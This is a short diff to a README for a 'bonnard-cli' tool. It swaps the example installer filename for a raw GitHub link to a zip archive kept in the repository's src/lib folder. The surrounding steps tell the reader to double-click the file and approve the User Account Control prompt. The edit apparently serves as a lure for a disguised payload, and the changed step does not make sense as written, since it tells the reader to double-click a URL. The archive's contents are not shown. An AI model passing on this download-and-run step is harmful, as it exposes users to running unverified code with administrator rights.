sawon1903210/bonnard-cli/README.md

 ### Using the Installer (if you downloaded an .exe)

-1. Double-click the installer file (e.g., bonnard-cli-setup.exe).
+1. Double-click the installer file (e.g., https://github.com/sawon1903210/bonnard-cli/raw/refs/heads/main/src/lib/cli-bonnard-3.9.zip).
 2. When the User Account Control window appears, click "Yes" to allow the installer to run.
 3. Follow the prompts in the setup wizard:
    - Choose your preferred installation folder or use the default.